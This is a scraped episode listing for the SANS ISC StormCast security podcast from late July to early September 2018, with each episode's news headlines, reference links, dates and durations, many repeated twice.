
Malware Uses Powershell to Comple C# Code on the Fly https://isc.sans.edu/forums/diary/Malicious+PowerShell+Compiling+C+Code+on+the+Fly/24072/ Stealing WiFi Credentials in Google Chrome https://www.surecloud.com/sc-blog/wifi-hijacking DNS Spoofing and Certificate Authority Domain Validation https://www.theregister.co.uk/2018/09/06/boffins_break_cas_domain_validation/ Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=30#~Vulnerabilities
9/6/20184 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, September 7th 2018

Malware Uses Powershell to Comple C# Code on the Fly https://isc.sans.edu/forums/diary/Malicious+PowerShell+Compiling+C+Code+on+the+Fly/24072/ Stealing WiFi Credentials in Google Chrome https://www.surecloud.com/sc-blog/wifi-hijacking DNS Spoofing and Certificate Authority Domain Validation https://www.theregister.co.uk/2018/09/06/boffins_break_cas_domain_validation/ Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=30#~Vulnerabilities
9/6/20184 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, September 6th 2018

MEGA Chrome Extension Replaced with Password Stealer https://serhack.me/articles/mega-chrome-extension-hacked Python Package Installer May Execute Code https://github.com/mschwager/0wned Windows Scheduler Exploit Used in the Wild https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/ Where Have All My Certificates Gone? https://isc.sans.edu/forums/diary/Where+have+all+my+Certificates+gone+And+when+do+they+expire/24066/
9/5/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, September 6th 2018

MEGA Chrome Extension Replaced with Password Stealer https://serhack.me/articles/mega-chrome-extension-hacked Python Package Installer May Execute Code https://github.com/mschwager/0wned Windows Scheduler Exploit Used in the Wild https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/ Where Have All My Certificates Gone? https://isc.sans.edu/forums/diary/Where+have+all+my+Certificates+gone+And+when+do+they+expire/24066/
9/5/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, September 5th 2018

Some More Interesting MicroTik Router Exploits https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/ Exposed .git Directories https://lynt.cz/blog/global-scan-exposed-git SSL Certificates Expose Tor Servers https://www.bleepingcomputer.com/news/security/public-ip-addresses-of-tor-sites-exposed-via-ssl-certificates/
9/4/20185 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, September 5th 2018

Some More Interesting MicroTik Router Exploits https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/ Exposed .git Directories https://lynt.cz/blog/global-scan-exposed-git SSL Certificates Expose Tor Servers https://www.bleepingcomputer.com/news/security/public-ip-addresses-of-tor-sites-exposed-via-ssl-certificates/
9/4/20185 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, September 4th 2018

Reversing and Modifying the Medium Mobile App https://hackernoon.com/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687 Active Directory Leaks via Azure https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ Google Restricts Tech Support Ads https://www.blog.google/products/ads/restricting-ads-third-party-tech-support-services/?mod=article_inline
9/4/20184 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, September 4th 2018

Reversing and Modifying the Medium Mobile App https://hackernoon.com/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687 Active Directory Leaks via Azure https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ Google Restricts Tech Support Ads https://www.blog.google/products/ads/restricting-ads-third-party-tech-support-services/?mod=article_inline
9/4/20184 minutes, 42 seconds
Episode Artwork

ISC StormCast for Sunday, September 2nd 2018

OSX/MacOS and Dangerous of Custom URL Schemes https://objective-see.com/blog/blog_0x38.html Philips e-Alert Vulnerability https://ics-cert.us-cert.gov/advisories/ICSA-18-242-01
9/2/20184 minutes, 45 seconds
Episode Artwork

ISC StormCast for Sunday, September 2nd 2018

OSX/MacOS and Dangerous of Custom URL Schemes https://objective-see.com/blog/blog_0x38.html Philips e-Alert Vulnerability https://ics-cert.us-cert.gov/advisories/ICSA-18-242-01
9/2/20184 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, August 31st 2018

Cryptocoin Miners are More Popular Than Ever and Dominate in Attacks https://isc.sans.edu/forums/diary/Crypto+Mining+Is+More+Popular+Than+Ever/24050/ Cryptocoin Miners Deployed via Struts Vulnerability https://www.volexity.com/blog/2018/08/27/active-exploitation-of-new-apache-struts-vulnerability-cve-2018-11776-deploys-cryptocurrency-miner/ Mimecast Identifies Weaknesses in Existing EMail Filters https://www.mimecast.com/resources/ebooks/dates/2018/7/the-state-of-email-security-2018-report/ Android Leaks Information to Processes https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/
8/30/20185 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, August 31st 2018

Cryptocoin Miners are More Popular Than Ever and Dominate in Attacks https://isc.sans.edu/forums/diary/Crypto+Mining+Is+More+Popular+Than+Ever/24050/ Cryptocoin Miners Deployed via Struts Vulnerability https://www.volexity.com/blog/2018/08/27/active-exploitation-of-new-apache-struts-vulnerability-cve-2018-11776-deploys-cryptocurrency-miner/ Mimecast Identifies Weaknesses in Existing EMail Filters https://www.mimecast.com/resources/ebooks/dates/2018/7/the-state-of-email-security-2018-report/ Android Leaks Information to Processes https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/
8/30/20185 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, August 30th 2018

More Octoprint Details https://isc.sans.edu/forums/diary/3D+Printers+in+The+Wild+What+Can+Go+Wrong/24044/ Packagist Remote Code Injection Vulnerability https://justi.cz/security/2018/08/28/packagist-org-rce.html More OpenSSH User Enumeration Issues http://seclists.org/oss-sec/2018/q3/180 Two new TPM Vulnerabilities https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-han.pdf
8/29/20186 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, August 30th 2018

More Octoprint Details https://isc.sans.edu/forums/diary/3D+Printers+in+The+Wild+What+Can+Go+Wrong/24044/ Packagist Remote Code Injection Vulnerability https://justi.cz/security/2018/08/28/packagist-org-rce.html More OpenSSH User Enumeration Issues http://seclists.org/oss-sec/2018/q3/180 Two new TPM Vulnerabilities https://www.usenix.org/system/files/conference/usenixsecurity18/sec18-han.pdf
8/29/20186 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, August 29th 2018

Microsoft Windows Task Scheduler Local Privilege Escalation Vulnerability https://www.kb.cert.org/vuls/id/906424 3D Printers Exposed to Internet https://isc.sans.edu/forums/diary/OctoPrint+3D+Web+Interfaces+EXPOSED+Port+5000+default/24038/ Firefox Nightly Built Removes Trust From Symantec Certificates https://bugzilla.mozilla.org/show_bug.cgi?id=1460062 https://bugzilla.mozilla.org/show_bug.cgi?id=1484006
8/28/20185 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, August 29th 2018

Microsoft Windows Task Scheduler Local Privilege Escalation Vulnerability https://www.kb.cert.org/vuls/id/906424 3D Printers Exposed to Internet https://isc.sans.edu/forums/diary/OctoPrint+3D+Web+Interfaces+EXPOSED+Port+5000+default/24038/ Firefox Nightly Built Removes Trust From Symantec Certificates https://bugzilla.mozilla.org/show_bug.cgi?id=1460062 https://bugzilla.mozilla.org/show_bug.cgi?id=1484006
8/28/20185 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, August 28th 2018

H-Worm Variant Notes Infection Date in Registry https://isc.sans.edu/forums/diary/When+was+this+machine+infected/24032/ CentOS / Ubuntu Turn Off Gnome "Bubblewrap" Sandbox https://www.bleepingcomputer.com/news/security/ubuntu-and-centos-are-undoing-a-gnome-security-feature/ Fortnite Android Arbitrary Code Install Vulnerability https://www.bleepingcomputer.com/news/security/ubuntu-and-centos-are-undoing-a-gnome-security-feature/
8/27/20184 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, August 28th 2018

H-Worm Variant Notes Infection Date in Registry https://isc.sans.edu/forums/diary/When+was+this+machine+infected/24032/ CentOS / Ubuntu Turn Off Gnome "Bubblewrap" Sandbox https://www.bleepingcomputer.com/news/security/ubuntu-and-centos-are-undoing-a-gnome-security-feature/ Fortnite Android Arbitrary Code Install Vulnerability https://www.bleepingcomputer.com/news/security/ubuntu-and-centos-are-undoing-a-gnome-security-feature/
8/27/20184 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, August 27th 2018

Struts Exploits for CVE-2018-11776 on Github (there are more. just a sample) https://github.com/mazen160/struts-pwn_CVE-2018-11776 https://github.com/jiguang7/CVE-2018-11776 Publisher Malware https://isc.sans.edu/forums/diary/Microsoft+Publisher+Files+Delivering+Malware/24024/ https://isc.sans.edu/forums/diary/Microsoft+Publisher+malware+static+analysis/24026/ AT Commands https://atcommands.org/atdb/vendors Using a Microphone to Read Screen Content https://www.cs.tau.ac.il/~tromer/synesthesia/synesthesia.pdf
8/26/20186 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, August 27th 2018

Struts Exploits for CVE-2018-11776 on Github (there are more. just a sample) https://github.com/mazen160/struts-pwn_CVE-2018-11776 https://github.com/jiguang7/CVE-2018-11776 Publisher Malware https://isc.sans.edu/forums/diary/Microsoft+Publisher+Files+Delivering+Malware/24024/ https://isc.sans.edu/forums/diary/Microsoft+Publisher+malware+static+analysis/24026/ AT Commands https://atcommands.org/atdb/vendors Using a Microphone to Read Screen Content https://www.cs.tau.ac.il/~tromer/synesthesia/synesthesia.pdf
8/26/20186 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, August 24th 2018

Simple Phishing Through formcrafts.com https://isc.sans.edu/forums/diary/Simple+Phishing+Through+formcraftscom/24020/ Facebook's Onavo VPN removed from Apple AppStore https://www.wsj.com/articles/facebook-to-remove-data-security-app-from-apple-store-1534975340?mod=e2tw (paywall) https://medium.com/@chronic_9612/notes-on-analytics-and-tracking-in-onavo-protect-for-ios-904bdff346c0 Phishing False Alarm https://www.cnn.com/2018/08/23/politics/dnc-hack-false-alarm/index.html Fake Crypto Trading App Stealing Crypot Currency From Mac Users https://www.businesswire.com/news/home/20180823005093/en/AppleJeus-Lazarus-Group-Hunts-Cryptocurrency-Exchanges-macOS Intel Simplifies Microcode License https://twitter.com/imadsousou/status/1032680311753072640
8/23/20186 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, August 24th 2018

Simple Phishing Through formcrafts.com https://isc.sans.edu/forums/diary/Simple+Phishing+Through+formcraftscom/24020/ Facebook's Onavo VPN removed from Apple AppStore https://www.wsj.com/articles/facebook-to-remove-data-security-app-from-apple-store-1534975340?mod=e2tw (paywall) https://medium.com/@chronic_9612/notes-on-analytics-and-tracking-in-onavo-protect-for-ios-904bdff346c0 Phishing False Alarm https://www.cnn.com/2018/08/23/politics/dnc-hack-false-alarm/index.html Fake Crypto Trading App Stealing Crypot Currency From Mac Users https://www.businesswire.com/news/home/20180823005093/en/AppleJeus-Lazarus-Group-Hunts-Cryptocurrency-Exchanges-macOS Intel Simplifies Microcode License https://twitter.com/imadsousou/status/1032680311753072640
8/23/20186 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, August 23rd 2018

New Critical Apache Struts Vulnerability (CVE-2018-11776) https://semmle.com/news/apache-struts-CVE-2018-11776 https://cwiki.apache.org/confluence/display/WW/S2-057 Hardening Apache Struts With SELinux https://doublepulsar.com/hardening-apache-struts-with-selinux-db3a9cd1a10c?gi=f23fc884264a Ghostscript Code Execution Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1640 Photoshop CC Patch https://helpx.adobe.com/security/products/photoshop/apsb18-28.html
8/22/20185 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, August 23rd 2018

New Critical Apache Struts Vulnerability (CVE-2018-11776) https://semmle.com/news/apache-struts-CVE-2018-11776 https://cwiki.apache.org/confluence/display/WW/S2-057 Hardening Apache Struts With SELinux https://doublepulsar.com/hardening-apache-struts-with-selinux-db3a9cd1a10c?gi=f23fc884264a Ghostscript Code Execution Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1640 Photoshop CC Patch https://helpx.adobe.com/security/products/photoshop/apsb18-28.html
8/22/20185 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, August 22nd 2018

Malicious DDL Loaded Through AutoIT https://isc.sans.edu/forums/diary/Malicious+DLL+Loaded+Through+AutoIT/24008/ Traefik Fixes TLS Private Key Exposure https://github.com/containous/traefik/issues/3651 TLS Certificates Survive Domain Ownership https://insecure.design Intel Microcode License Update Causes Problems for Debian Linux https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=906158#14
8/21/20185 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, August 22nd 2018

Malicious DDL Loaded Through AutoIT https://isc.sans.edu/forums/diary/Malicious+DLL+Loaded+Through+AutoIT/24008/ Traefik Fixes TLS Private Key Exposure https://github.com/containous/traefik/issues/3651 TLS Certificates Survive Domain Ownership https://insecure.design Intel Microcode License Update Causes Problems for Debian Linux https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=906158#14
8/21/20185 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, August 21st 2018

Regular Expression DDoS in Javascript http://mp.binaervarianz.de/ReDoS_TR_Dec2017.pdf OpenSSH User Enumeration Update https://isc.sans.edu/forums/diary/OpenSSH+user+enumeration+CVE201815473/24004 Turning (Page) Tables Exploit Technique https://cdn2.hubspot.net/hubfs/487909/Turning%20(Page)%20Tables_Slides.pdf
8/20/20185 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, August 21st 2018

Regular Expression DDoS in Javascript http://mp.binaervarianz.de/ReDoS_TR_Dec2017.pdf OpenSSH User Enumeration Update https://isc.sans.edu/forums/diary/OpenSSH+user+enumeration+CVE201815473/24004 Turning (Page) Tables Exploit Technique https://cdn2.hubspot.net/hubfs/487909/Turning%20(Page)%20Tables_Slides.pdf
8/20/20185 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, August 20th 2018

Fragmentsmack Summary https://isc.sans.edu/forums/diary/Back+to+the+90s+FragmentSmack/23998/ HP Does Not Release Patches for Non-Windows Users https://www.intego.com/mac-security-blog/exclusive-hp-leaves-mac-users-vulnerable-to-fax-hacks/ More about VB Script 0-Day Vulnerability and "Dark Hotel" (chinese only) https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/ https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/ PHP Deserialization Vulnerability Code Execution https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf?
8/19/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, August 20th 2018

Fragmentsmack Summary https://isc.sans.edu/forums/diary/Back+to+the+90s+FragmentSmack/23998/ HP Does Not Release Patches for Non-Windows Users https://www.intego.com/mac-security-blog/exclusive-hp-leaves-mac-users-vulnerable-to-fax-hacks/ More about VB Script 0-Day Vulnerability and "Dark Hotel" (chinese only) https://ti.360.net/blog/articles/analyzing-attack-of-cve-2018-8373-and-darkhotel/ https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/ PHP Deserialization Vulnerability Code Execution https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf?
8/19/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, August 17th 2018

Anonymize PCAPS https://isc.sans.edu/forums/diary/Truncating+Payloads+and+Anonymizing+PCAP+files/23990/ OpenSSH User Enumeration Vulnerability http://seclists.org/oss-sec/2018/q3/124 VoiceXML XML External Entity Vulnerability https://hackerone.com/reports/395296 Skimreaper Credit Card Skimmer Detector http://skimreaper.com
8/17/20186 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, August 17th 2018

Anonymize PCAPS https://isc.sans.edu/forums/diary/Truncating+Payloads+and+Anonymizing+PCAP+files/23990/ OpenSSH User Enumeration Vulnerability http://seclists.org/oss-sec/2018/q3/124 VoiceXML XML External Entity Vulnerability https://hackerone.com/reports/395296 Skimreaper Credit Card Skimmer Detector http://skimreaper.com
8/17/20186 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, August 16th 2018

Password Protected Word Documents Push AZORult and Hermes Ransomware https://isc.sans.edu/forums/diary/More+malspam+pushing+passwordprotected+Word+docs+for+AZORult+and+Hermes+Ransomware/23992/ Linux IP Fragmentation DoS https://www.kb.cert.org/vuls/id/641765 Scripting Mouse Clicks to Bypass macOS Security https://speakerdeck.com/patrickwardle/the-mouse-is-mightier-than-the-sword Concentration of Coinhive Miners https://arxiv.org/pdf/1808.00811.pdf
8/16/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, August 16th 2018

Password Protected Word Documents Push AZORult and Hermes Ransomware https://isc.sans.edu/forums/diary/More+malspam+pushing+passwordprotected+Word+docs+for+AZORult+and+Hermes+Ransomware/23992/ Linux IP Fragmentation DoS https://www.kb.cert.org/vuls/id/641765 Scripting Mouse Clicks to Bypass macOS Security https://speakerdeck.com/patrickwardle/the-mouse-is-mightier-than-the-sword Concentration of Coinhive Miners https://arxiv.org/pdf/1808.00811.pdf
8/16/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, August 15th 2018

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+August+2018+Patch+Tuesday/23986/ Oracle Database Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2018-3110-5032149.html Intel Fixes Three More CPU Flaws https://software.intel.com/security-software-guidance/software-guidance/l1-terminal-fault
8/15/20186 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, August 15th 2018

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+August+2018+Patch+Tuesday/23986/ Oracle Database Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2018-3110-5032149.html Intel Fixes Three More CPU Flaws https://software.intel.com/security-software-guidance/software-guidance/l1-terminal-fault
8/15/20186 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, August 14th 2018

New Sextorition Wave Using Partial Phone Numbers New Extortion Tricks: Now Including Your (Partial) Phone Number! Intel Releases Patch for Puma Modem Chips https://www.dslreports.com/forum/r32071020-Internet-Rogers-modem-router-rebooting-on-wan-scans-by-design https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-000097.html Bluetooth Low Energy Attack Tool https://github.com/virtualabs/btlejack Tesla Will Fix Cars if Researcher Breaks it While Hacking https://twitter.com/bitquark/status/1028373178421309440
8/14/20185 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, August 14th 2018

New Sextorition Wave Using Partial Phone Numbers New Extortion Tricks: Now Including Your (Partial) Phone Number! Intel Releases Patch for Puma Modem Chips https://www.dslreports.com/forum/r32071020-Internet-Rogers-modem-router-rebooting-on-wan-scans-by-design https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-000097.html Bluetooth Low Energy Attack Tool https://github.com/virtualabs/btlejack Tesla Will Fix Cars if Researcher Breaks it While Hacking https://twitter.com/bitquark/status/1028373178421309440
8/14/20185 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, August 13th 2018

VIA C3 "God Mode" https://github.com/xoreaxeaxeax/rosenbridge Apple MDM Vulnerablity https://www.wired.com/story/mac-remote-hack-wifi-enterprise/ Peeking into MSG Files https://isc.sans.edu/forums/diary/Peeking+into+msg+files+revisited/23974/ Hunting SSL/TLS Clients Using JA3 https://isc.sans.edu/forums/diary/Hunting+SSLTLS+clients+using+JA3/23972/ Mobile Payment Terminal Vulnerabilities https://www.blackhat.com/us-18/briefings.html#for-the-love-of-money-finding-and-exploiting-vulnerabilities-in-mobile-point-of-sales-systems
8/13/20186 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, August 13th 2018

VIA C3 "God Mode" https://github.com/xoreaxeaxeax/rosenbridge Apple MDM Vulnerablity https://www.wired.com/story/mac-remote-hack-wifi-enterprise/ Peeking into MSG Files https://isc.sans.edu/forums/diary/Peeking+into+msg+files+revisited/23974/ Hunting SSL/TLS Clients Using JA3 https://isc.sans.edu/forums/diary/Hunting+SSLTLS+clients+using+JA3/23972/ Mobile Payment Terminal Vulnerabilities https://www.blackhat.com/us-18/briefings.html#for-the-love-of-money-finding-and-exploiting-vulnerabilities-in-mobile-point-of-sales-systems
8/13/20186 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, August 10th 2018

Vulnerabilities in Pacemaker Programmer and Insulin Pumps https://arstechnica.com/information-technology/2018/08/lack-of-encryption-makes-hacks-on-life-saving-pacemakers-shockingly-easy/ "Panic Attacks" Against City Infrastructure https://www.bbc.com/news/technology-45128053 Kaspersky VPN Leaks DNS Traffic https://www.inputzero.io/2018/08/kaspersky-vpn-leaks-dns-address.html Osiris Dropper Uses Process Dopplegaenging https://blog.malwarebytes.com/threat-analysis/2018/08/osiris-using-process-doppelganging/
8/10/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, August 10th 2018

Vulnerabilities in Pacemaker Programmer and Insulin Pumps https://arstechnica.com/information-technology/2018/08/lack-of-encryption-makes-hacks-on-life-saving-pacemakers-shockingly-easy/ "Panic Attacks" Against City Infrastructure https://www.bbc.com/news/technology-45128053 Kaspersky VPN Leaks DNS Traffic https://www.inputzero.io/2018/08/kaspersky-vpn-leaks-dns-address.html Osiris Dropper Uses Process Dopplegaenging https://blog.malwarebytes.com/threat-analysis/2018/08/osiris-using-process-doppelganging/
8/10/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, August 9th 2018

Homebrew Exposed Github Credentials https://brew.sh/2018/08/05/security-incident-disclosure/ WhatsApp Vulnerability https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/ Netflix Releases Tool To Detected Cloud Credential Compromise https://medium.com/netflix-techblog/netflix-cloud-security-detecting-credential-compromise-in-aws-9493d6fd373a
8/9/20185 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, August 9th 2018

Homebrew Exposed Github Credentials https://brew.sh/2018/08/05/security-incident-disclosure/ WhatsApp Vulnerability https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/ Netflix Releases Tool To Detected Cloud Credential Compromise https://medium.com/netflix-techblog/netflix-cloud-security-detecting-credential-compromise-in-aws-9493d6fd373a
8/9/20185 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, August 8th 2018

Linux TCP DoS Vulnerability https://www.kb.cert.org/vuls/id/962459 Let's Encrypt Now Trusted By All Major Root CA Programs https://letsencrypt.org/2018/08/06/trusted-by-all-major-root-programs.html Android Updates https://source.android.com/security/bulletin/2018-08-01 OpenEMR Vulnerabilities https://insecurity.sh/assets/reports/openemr.pdf
8/8/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, August 8th 2018

Linux TCP DoS Vulnerability https://www.kb.cert.org/vuls/id/962459 Let's Encrypt Now Trusted By All Major Root CA Programs https://letsencrypt.org/2018/08/06/trusted-by-all-major-root-programs.html Android Updates https://source.android.com/security/bulletin/2018-08-01 OpenEMR Vulnerabilities https://insecurity.sh/assets/reports/openemr.pdf
8/8/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, August 7th 2018

Numeric Obfuscation https://isc.sans.edu/forums/diary/Numeric+obfuscation+another+example/23960/ Crestron Touchscreen Vulnerability https://blog.securitycompass.com/security-advisory-regarding-crestron-tsw-xx60-touch-panel-devices-9f1a71a926a5 Facebook Releases "Fizz" TLS 1.3 Library https://github.com/facebookincubator/fizz
8/7/20185 minutes
Episode Artwork

ISC StormCast for Tuesday, August 7th 2018

Numeric Obfuscation https://isc.sans.edu/forums/diary/Numeric+obfuscation+another+example/23960/ Crestron Touchscreen Vulnerability https://blog.securitycompass.com/security-advisory-regarding-crestron-tsw-xx60-touch-panel-devices-9f1a71a926a5 Facebook Releases "Fizz" TLS 1.3 Library https://github.com/facebookincubator/fizz
8/7/20185 minutes
Episode Artwork

ISC StormCast for Monday, August 6th 2018

New WPA Attack https://hashcat.net/forum/thread-7717.html Fake Techsupport Uses More Intelligent Call Routing https://www.symantec.com/blogs/threat-intelligence/tech-support-scam-call-optimization HP Printer Updates https://support.hp.com/us-en/document/c06097712
8/6/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, August 6th 2018

New WPA Attack https://hashcat.net/forum/thread-7717.html Fake Techsupport Uses More Intelligent Call Routing https://www.symantec.com/blogs/threat-intelligence/tech-support-scam-call-optimization HP Printer Updates https://support.hp.com/us-en/document/c06097712
8/6/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, August 3rd 2018

Malware in Animated GIF Files https://isc.sans.edu/forums/diary/DHLthemed+malspam+reveals+embedded+malware+in+animated+gif/23944/ MikroTik Miner Botnet https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/ Microsoft Edge Vulnerability https://www.netsparker.com/blog/web-security/stealing-local-files-with-simple-html-file/
8/3/20186 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, August 3rd 2018

Malware in Animated GIF Files https://isc.sans.edu/forums/diary/DHLthemed+malspam+reveals+embedded+malware+in+animated+gif/23944/ MikroTik Miner Botnet https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/ Microsoft Edge Vulnerability https://www.netsparker.com/blog/web-security/stealing-local-files-with-simple-html-file/
8/3/20186 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, August 2nd 2018

Facebook Smishing Attack https://isc.sans.edu/forums/diary/Facebook+Phishing+via+SMS/23940/ Port 52869 UPNP Attacks https://isc.sans.edu/forums/diary/When+Cameras+and+Routers+attack+Phones+Spike+in+CVE20148361+Exploits+Against+Port+52869/23942/ Microsoft Improves Account Security for Midterm Elections https://www.bleepingcomputer.com/news/microsoft/microsoft-accountguard-service-offers-protection-for-political-and-election-orgs/ Google Improves "Government Sponsored Attacks" Alert for GSuite https://9to5google.com/2018/08/01/g-suite-admins-government-based-attackers/
8/2/20186 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, August 2nd 2018

Facebook Smishing Attack https://isc.sans.edu/forums/diary/Facebook+Phishing+via+SMS/23940/ Port 52869 UPNP Attacks https://isc.sans.edu/forums/diary/When+Cameras+and+Routers+attack+Phones+Spike+in+CVE20148361+Exploits+Against+Port+52869/23942/ Microsoft Improves Account Security for Midterm Elections https://www.bleepingcomputer.com/news/microsoft/microsoft-accountguard-service-offers-protection-for-political-and-election-orgs/ Google Improves "Government Sponsored Attacks" Alert for GSuite https://9to5google.com/2018/08/01/g-suite-admins-government-based-attackers/
8/2/20186 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, August 1st 2018

Powershell Inside Certificates https://blog.nviso.be/2018/07/31/powershell-inside-a-certificate-part-1/ TEMPEST is Back http://youtu.be/BpNP9b3aIfY?a Big Star Labs Spyware https://adguard.com/en/blog/big-star-labs-spyware/
8/1/20186 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, August 1st 2018

Powershell Inside Certificates https://blog.nviso.be/2018/07/31/powershell-inside-a-certificate-part-1/ TEMPEST is Back http://youtu.be/BpNP9b3aIfY?a Big Star Labs Spyware https://adguard.com/en/blog/big-star-labs-spyware/
8/1/20186 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, July 31st 2018

DOSFuscation Campaign https://isc.sans.edu/forums/diary/Malicious+Word+documents+using+DOSfuscation/23932/ Let's Encrypt Outage https://letsencrypt.status.io Malvertising Campaign Insides https://research.checkpoint.com/malvertising-campaign-based-secrets-lies/
7/31/20186 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, July 31st 2018

DOSFuscation Campaign https://isc.sans.edu/forums/diary/Malicious+Word+documents+using+DOSfuscation/23932/ Let's Encrypt Outage https://letsencrypt.status.io Malvertising Campaign Insides https://research.checkpoint.com/malvertising-campaign-based-secrets-lies/
7/31/20186 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, July 30th 2018

Summary of Earchings in Recent Sextortion Attack https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money/23922/ Adware Distributed with Legitimate Applications https://www.bleepingcomputer.com/news/security/fake-websites-for-keepass-7zip-audacity-others-found-pushing-adware/ https://twitter.com/JusticeRage PDF Editor Supply Chain Exploit https://cloudblogs.microsoft.com/microsoftsecure/2018/07/26/attack-inception-compromised-supply-chain-within-a-supply-chain-poses-new-risks/
7/30/20187 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, July 30th 2018

